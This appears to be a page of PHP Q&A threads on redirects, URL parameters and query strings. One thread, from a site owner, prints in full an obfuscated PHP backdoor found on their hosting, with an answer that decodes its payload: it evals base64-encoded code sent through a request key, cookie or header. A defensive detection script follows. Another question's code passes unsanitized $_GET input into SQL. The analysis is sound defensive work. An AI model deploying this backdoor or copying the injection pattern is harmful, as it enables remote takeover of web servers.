Empty parameter when passing through header location - php

I'm setting a variable based on an array. When I echo the variable it displays on the screen, however when I try to add it to a Header Location it doesn't show up in the URL of the next page - everything else does:
$myid = $selected_cat3[0]['id'];
Header("Location:/cat-dashboard/cat-results/?catID=" . $myid
. "&question1=" . $_GET['question1'] . "&question2=" . $_GET['question2']
. "&question3=" . $_GET['question3'] . "&question4=" . $_GET['question4']
. "&question5=" . $_GET['question5'] . "&question6=" . $_GET['question6']
. "&question7=" . $_GET['question7'] . "&question8=" . $_GET['question8']);
This is the generated url:
/cat-dashboard/cat-results/?catID=&question1=0&question2=3&question3=1&question4=1&question5=1&question6=2&question7=1&question8=3
Am I doing something wrong? It doesn't show even if I use: $myid = "1";

Related

Send parameter to url in PHP

I'm having trouble sending a parameter into a URL of another page. I'm new to coding in PHP so I do not really know how to get this through. I already did some research on this about the $_GET method, but it's still not working.
Code in 1st page:
echo "<tr><td><a href='application_desktop.php?id='". $temp ."'>" . $row['appl_nric_date'] . "</td><td>" . $row['applicant_name'] . "</td><td>" . $row['nric'] . "</td><td>" . $row['application_date'] . "</a></td></tr>";
where $temp is the parameter I want to pass to the url.
Code in 2nd page:
$id = $_GET['id'];
$applicants = mysql_query("SELECT * FROM tblapplication WHERE appl_nric_date = $id");
//$applicants = mysql_query("SELECT * FROM tblapplication WHERE appl_nric_date = 10");
The SQL query returns an error that the $id is null, and the URL doesn't display the id.
Do it like this on your html line
echo "<tr><td>" . $row['appl_nric_date'] . "</td><td>" . $row['applicant_name'] . "</td><td>" . $row['nric'] . "</td><td>" . $row['application_date'] . "</td></tr>";
I ran your code to see what it output:
// Make some sample data
$row = [
'appl_nric_date' => '9999-99-99',
'applicant_name' => 'some-applicant',
'nric' => 'wtf-is-an-nric',
'application_date' => '8888-99-00'
];
$temp = 'something';
echo "<tr><td><a href='application_desktop.php?id='". $temp ."'>"
. $row['appl_nric_date']
. "</td><td>"
. $row['applicant_name']
. "</td><td>"
. $row['nric']
. "</td><td>"
. $row['application_date'] . "</a></td></tr>";
echo PHP_EOL;
This is what it outputs:
<tr><td><a href='application_desktop.php?id='something'>9999-99-99</td><td>some-applicant</td><td>wtf-is-an-nric</td><td>8888-99-00</a></td></tr>
The use of single quotes is not right. Remove the single quote after id=.
Looks like you are not nesting your html elements correctly. You place the opening A tag inside the first TD but then you close that TD without closing the A tag.
To debug what you are doing in the browser, the address bar where the URL lives should show the parameters that are sent to the destination page. You can just look at that to verify that it sent what you intended.
In the destination page, you can add the following to debug:
<pre>
<?php print_r($_GET) ?>
</pre>
The above will let you see what you are getting from the first page.

Randomly named php file on my hosting server

About a week ago, I noticed there was a seemingly randomly named PHP file that had appeared in the root folder of my shared web hosting. The name of the file is "hvkqwvkj.php" and I very stupidly removed it before I looked at the owner/group and permission information. I'd like to know what this is and how it got there. Here are the contents of that file:
<?php
$circulated='ad,$E)eNf'; $chickadees= 't';$glissade ='TeUs';$antoinette= '6'; $lithic='o'; $hydrophobic='TR)iec$$W';$blaspheming='G';$eerily= 'u';$diagrammer =']A))eDO'; $huh= '(rCS/H:s';$din = 'g'; $harri = '.';$housed ='S';$browbeating = 'E(K+Nl';$deniable = 'dew_'; $flared='[';$baseboards = 'R;I';$conversed= '-'; $jammed = 'C'; $confident ='s';$homed ='a'; $bullock ='?';$asdf = 'T$v]';$debugs= 'LV9[U';$cheaters='$'; $juice = ';';$impropriety=')Hf6]tNar'; $fluently= '>(e;_sa'; $antagonism='t';
$jaquith= '"i_K4W';$canal ='(';$bookie='i';
$envies ='_n';$copyright='Pns#iSd'; $hampers='$'; $incontrovertible ='Te['; $irking ='?';$citadel ='iRy=';
$economizing= 'b'; $campanile = 'y'; $awn = 'N'; $compacting='c'; $journalist= 'O'; $evaluate = 'nQ:'; $booking = 'e'; $dolt= '_Q';$bottoming='U';$grabs= 'H';$covers ='(rrta';$breakfasted ='T_"(_uTM_';$confectionery = 'A'; $bolstered = 'E'; $kitti='a'; $kali ='neWn';$jersey ='e'; $fewer= 'a';
$earthmove ='a';$forgivable='1'; $hello =';Sru';$forwent = 'g';$gingham = '?';$fanatic='ot(RstP';$levee='S';$baser = 'B_,"c';$constructs= 'rai';$deletions='u';$attempters='g"sss_';$dispatcher ='ra=';$ken =')';$contrivance = '[D)dae'; $chrome ='i';$glutting='I<'; $devoutness= ';';$foible= '8';
$diagonally='$5D(vn';
$beauregard ='S';$ines='te]ee'; $imogen = 's';
$irene ='("as3:0$r';$grassier ='4';
$consortium ='r'; $appliance ='S'; $histochemistry= 'A'; $beamer='v';$enchain ='s'; $assaults= 'E';$davida='dNe'; $foamed= 'E)n';$cavity='=l';
$drudge='F';
$arraigning= 'p_E "i'; $firmware='",)a(';$jeanine= ')';
$equivalently ='"7$p'; $biller='m'; $likeness= 'i'; $closest = 'OP(vVrwJ$'; $commissioner='rU)o2';
$kaycee= 'c';$fanni = $kaycee['0'] .$commissioner[0] .$davida[2] .$firmware['3'].
$ines['0'] . $davida[2] . $arraigning['1'].$impropriety[2].$deletions. $foamed['2'] . $kaycee['0'].$ines['0']. $likeness . $commissioner[3].$foamed['2'];
$bob=$arraigning[3];
$druggist= $fanni ($bob,$davida[2] . $closest['3'].$firmware['3']. $cavity['1'] .$closest['2'].$firmware['3']. $commissioner[0]. $commissioner[0].
$firmware['3']. $campanile .$arraigning['1'].$equivalently['3'] . $commissioner[3] .$equivalently['3'] .
$closest['2'].$impropriety[2] .$deletions . $foamed['2'] . $kaycee['0'].$arraigning['1'] .
$attempters['0'] .$davida[2]. $ines['0'] .$arraigning['1']. $firmware['3'] . $commissioner[0] .$attempters['0'].$enchain .
$closest['2'] .$commissioner['2'] . $commissioner['2'] .$commissioner['2'] . $devoutness);$druggist ($closest['2'] ,$gingham,$attempters['0'],$dinnie['2'] ,$gwenneth ,$biller, $disdains[2],$closest['0'],$harri , $closest['8'] .$likeness. $cavity['0'].$firmware['3'] . $commissioner[0].
$commissioner[0].$firmware['3'] .
$campanile . $arraigning['1']. $biller.
$davida[2] .
$commissioner[0] . $attempters['0']. $davida[2] .$closest['2'] .$closest['8'] .$arraigning['1'].
$fanatic['3'] . $arraigning['2'].$dolt[1] .$commissioner['1'] .
$arraigning['2']. $appliance . $breakfasted[6]. $firmware['1'] .
$closest['8']. $arraigning['1'].
$jammed.$closest['0'].$closest['0'] .$jaquith['3'].
$glutting['0'] .
$arraigning['2']. $firmware['1']. $closest['8'] . $arraigning['1'].$appliance. $arraigning['2'].
$fanatic['3'] .$closest['4']. $arraigning['2'] . $fanatic['3'].$commissioner['2'] .
$devoutness. $closest['8'].$firmware['3']. $cavity['0'] . $likeness.$enchain. $enchain.
$davida[2] .
$ines['0'] . $closest['2'] .
$closest['8'] .$likeness. $contrivance[0].
$equivalently['0']. $foamed['2'] . $davida['0'].
$enchain .
$enchain.$closest['6'] .$firmware['3']. $foamed['2'].$deletions .$equivalently['0']. $ines[2] . $commissioner['2'].$gingham .
$closest['8'] .$likeness .$contrivance[0] .
$equivalently['0'].
$foamed['2'] . $davida['0'] .$enchain .$enchain .$closest['6'].$firmware['3'].$foamed['2'].$deletions .
$equivalently['0'] .
$ines[2] . $irene['5'] . $closest['2'].$likeness . $enchain. $enchain.$davida[2].$ines['0'] .$closest['2'].$closest['8'] . $likeness. $contrivance[0] .$equivalently['0'] . $grabs.$breakfasted[6] . $breakfasted[6] . $closest['1'] .$arraigning['1'] . $davida['1'].$diagonally[2] . $appliance.
$appliance .
$kali['2'].$histochemistry . $davida['1'].$commissioner['1'] . $equivalently['0'] . $ines[2].$commissioner['2'].$gingham. $closest['8'].
$likeness.$contrivance[0].
$equivalently['0'].$grabs .$breakfasted[6].$breakfasted[6] . $closest['1']. $arraigning['1'].$davida['1']. $diagonally[2] .$appliance .
$appliance. $kali['2'].$histochemistry . $davida['1'].$commissioner['1'].$equivalently['0'] . $ines[2] . $irene['5'].
$davida['0'] . $likeness.$davida[2]. $commissioner['2'].$devoutness.$davida[2]. $closest['3'] .$firmware['3'] .
$cavity['1'] .$closest['2'] . $enchain. $ines['0'] . $commissioner[0] .
$commissioner[0] .$davida[2].$closest['3'] . $closest['2']. $economizing .$firmware['3'].
$enchain.$davida[2] .$impropriety['3']. $grassier .$arraigning['1']. $davida['0'].$davida[2].$kaycee['0']. $commissioner[3].$davida['0'] .
$davida[2] .
$closest['2'].
$enchain.$ines['0'] .$commissioner[0] . $commissioner[0]. $davida[2] .$closest['3'] . $closest['2'].$closest['8']. $firmware['3'].$commissioner['2'].
$commissioner['2']. $commissioner['2'] . $commissioner['2'].
$devoutness );
I was able to parse out the actual coding.
The file employs obscurity to avoid detection. It defines a function and then uses eval to execute it.
Here is the payload (the important bit).
//Take all types of request data and merge them
//This opens up many types of attack vectors
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
//Look for a specific injected key called "ndsswanu" or HTTP_NDSSWANU and record its value if it's set
$a = isset($i["ndsswanu"]) ? $i["ndsswanu"] : (isset($i["HTTP_NDSSWANU"]) ? $i["HTTP_NDSSWANU"] : die);
//execute it
//iirc the reason for the double reverse is to avoid some characters being improperly encoded in base64.
//This statement runs any php code sent in the "ndsswanu" or HTTP_NDSSWANU key.
eval(strrev(base64_decode(strrev($a))));
You were correct to remove it immediately, however this is only a symptom of a greater problem. How the script got there is of a much larger concern.
This code would allow an attacker to remotely run any php code via a varied amount of attack vectors.
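The dropped file spells its function names from string offsets, so a search for a literal `eval(` does not find it. As an added example (not from the thread), this PHP sketch scores a file for that structure and decodes a captured `ndsswanu` value with the same `strrev`/`base64_decode` steps the payload uses, without executing it; the function names, the threshold of 20 and the sample data are assumptions.

```php
<?php
// Added example, not from the thread. Function names, the threshold and all
// sample values are constructed for illustration.

/** Count the traits of the dropped file: names spelled from string offsets, then called. */
function obfuscationScore(string $src): array
{
    // Pieces such as $var['3'] . or $var[3] . joined to spell a name at runtime.
    $offsets = preg_match_all('/\$\w+\[[\'"]?\d+[\'"]?\]\s*\./', $src);
    // A variable invoked as a function, e.g. $druggist (...).
    $calls = preg_match_all('/\$\w+\s*\(/', $src);
    // Literal sink names that a plain text search would look for.
    $literals = preg_match_all('/\b(eval|base64_decode|create_function)\s*\(/i', $src);
    return [
        'offset_concats' => $offsets,
        'variable_calls' => $calls,
        'literal_sinks'  => $literals,
        'suspicious'     => $offsets >= 20 && $calls >= 1, // assumed threshold
    ];
}

/** Undo strrev(base64_decode(strrev($a))) on a captured value; nothing is executed. */
function decodeCapturedValue(string $value): ?string
{
    $raw = base64_decode(strrev($value), true); // strict mode rejects non-base64 input
    return $raw === false ? null : strrev($raw);
}

/** Pull the trigger key out of access-log lines and decode what was sent. */
function decodeFromLog(array $lines, string $key = 'ndsswanu'): array
{
    $found = [];
    foreach ($lines as $line) {
        if (preg_match('/[?&]' . preg_quote($key, '/') . '=([^&\s"]+)/i', $line, $m)) {
            $found[] = decodeCapturedValue(urldecode($m[1]));
        }
    }
    return $found;
}

// Constructed sample: 25 offset pieces followed by a variable call, no literal sink.
$sample = '<?php $f = ' . str_repeat('$a[\'1\'] . ', 25) . '$b; $f ($c);';
// Constructed log line carrying a harmless one-statement test value.
$log = ['203.0.113.7 - - [01/Jan/2024:00:00:00 +0000] '
      . '"GET /hvkqwvkj.php?ndsswanu=%3D%3DQZjh2bgEzO HTTP/1.1" 200 5'];

var_dump(obfuscationScore($sample));
var_dump(decodeFromLog($log));
```

The payload also reads the key from POST data, cookies and the `Ndsswanu` request header (`HTTP_NDSSWANU`), which a default access log does not record, so an empty result does not rule out use.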

Syntax Error on php echo

I am having trouble getting the URL to display correctly. This works now, but the link has " in front of the URL, and yet the URL link works fine.
echo "<br>" . $result['text'] . " <em>(Contributed by: \"<a
href=\"http://example.com/portfolio?ID=$result[ID]\">" .
$result['display_name'] . "</a>" . ")</em>" . "<br>";
sigh:
echo '<br>' . $result['text'] . ' <em>(Contributed by: <a
href="http://example.com/portfolio?ID=' . $result['ID'] . '">' .
$result['display_name'] . '</a>)</em><br>';

php in header url error

I have just a quick question. I was using a normal HTML link tag to redirect to a PayPal checkout page and it was working fine even when I had PHP inside the URL. But when I was using it in a PHP header, the URL cuts off where I enter the PHP.
header('location: https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=<? echo $product . " " . $server ?>&amount=<? echo $xprice1; ?>%2e00&currency_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest');
You are placing the PHP code inside of the location redirect as a string. The code is not being evaluated as PHP.
Try this instead:
<?php
$url = "https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=" . $product . " " . $server ."&amount=" . $xprice1 . "%2e00&currency_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest";
header('location: ' . $url);
Or, you could keep it in one line like so:
<?php
header('location: ' . "https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=" . $product . " " . $server ."&amount=" . $xprice1 . "%2e00&currency_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest");
header('location: https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=<? echo $product' . " " . '$server ?>&amount=<? echo $xprice1; ?>%2e00&currency_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest');
This may solve your problem. Please don't forget to tick the answer right if it works.
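Both the `Header("Location: ...")` question at the top of this page and the PayPal redirect above build the query string by hand. As an added example (not code from either thread), the sketch below lets `http_build_query()` percent-encode every value and validates the `questionN` answers first; the function names, the 0 to 9 answer range and all sample values are assumptions.

```php
<?php
// Added example, not code from either thread. Function names, the 0-9 answer
// range and all sample values are assumptions made for illustration.

/** Build a redirect target; http_build_query() percent-encodes every value. */
function buildRedirect(string $base, array $params): string
{
    // $base is not encoded, so refuse line breaks there before it reaches header().
    if (preg_match('/[\r\n]/', $base)) {
        throw new InvalidArgumentException('line break in redirect base');
    }
    return $base . '?' . http_build_query($params, '', '&', PHP_QUERY_RFC3986);
}

/** Keep only question1..questionN, each validated as an integer in range. */
function answersFrom(array $get, int $count = 8): array
{
    $range = ['options' => ['min_range' => 0, 'max_range' => 9]];
    $clean = [];
    for ($n = 1; $n <= $count; $n++) {
        $v = filter_var($get["question$n"] ?? null, FILTER_VALIDATE_INT, $range);
        if ($v === false) { // missing keys also end up here
            throw new InvalidArgumentException("question$n missing or out of range");
        }
        $clean["question$n"] = $v;
    }
    return $clean;
}

// Constructed stand-in for $_GET, matching the URL shown in the first question.
$get = ['question1' => '0', 'question2' => '3', 'question3' => '1', 'question4' => '1',
        'question5' => '1', 'question6' => '2', 'question7' => '1', 'question8' => '3'];
$results = buildRedirect('/cat-dashboard/cat-results/',
                         ['catID' => 1] + answersFrom($get));

// Constructed product data; the space in item_name is percent-encoded.
$product = 'Gold plan'; $server = 'eu-west'; $xprice1 = 10;
$paypal = buildRedirect('https://www.paypal.com/cgi-bin/webscr', [
    'cmd' => '_xclick', 'business' => 'XXXX', 'lc' => 'UK',
    'item_name' => $product . ' ' . $server,
    'amount' => $xprice1 . '.00', 'currency_code' => 'GBP',
]);

// In a web request: header('Location: ' . $results); exit;
echo $results, PHP_EOL, $paypal, PHP_EOL;
```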

URL parsing and sessions in Reservation system

I am creating a flight/hotel reservation system like farecompare.com. Farecompare parses values to other sites and creates sessions on other sites too. Can anyone tell me how they create sessions in it? I can parse the URL but I am not able to create sessions.
public function flight($depart, $return, $from, $to, $type, $class,
                       $adults, $seniors, $children) {
    $dep = explode("/", $depart);
    $ret = explode("/", $return);
    if ($type == 'RoundTrip') {
        $expurl = 'http://www.expedia.co.in/Flights-Search?trip=' .
            strtolower($type) . '&leg1=from%3A' . $from .
            '%29%2Cto%3A' . $to .
            '%29%2Cdeparture%3A' . $dep[1] .
            '/'.$dep[0].'/'.$dep[2].
            'TANYT&leg2=from%3A' . $to .
            '%29%2Cto%3A' . $from .
            '%29%2Cdeparture%3A' .
            $ret[1].'/'.$ret[0].'/'.$ret[2] .
            'TANYT&passengers=children%3A' . $children .
            '%2Cadults%3A' . $adults .
            '%2Cseniors%3A' . $seniors .
            '%2Cinfantinlap%3AY&options=cabinclass%3Aeconomy'.
            '%2Cnopenalty%3AN%2Csortby%3Aprice&mode=search';
        echo 'Expedia';
    } else {
        $type = 'oneway';
        $expurl = 'http://www.expedia.co.in/Flights-Search?trip='.
            strtolower($type) . '&leg1=from%3A' . $from .
            '%29%2Cto%3A' . $to . '%29%2Cdeparture%3A' .
            $dep[1].'/'.$dep[0].'/'.$dep[2] .
            'TANYT&passengers=children%3A' . $children .
            '%2Cadults%3A' . $adults .
            '%2Cseniors%3A' . $seniors .
            '%2Cinfantinlap%3AY&options=cabinclass%3Aeconomy'.
            '%2Cnopenalty%3AN%2Csortby%3Aprice&mode=search';
        echo 'Expedia';
    }
}
I worked on Expedia by parsing the URL to get data, but there are other sites like cheapoait, travelocity etc. which use sessions. How to create sessions?
I would assume they store it in the cookies.
We cannot access session data of another domain on our site. Data transfer is done using web services (SOAP or REST) in the form of XML. That can be retrieved on the other domain, stored in the session and cookies, and used for calculation in the website.
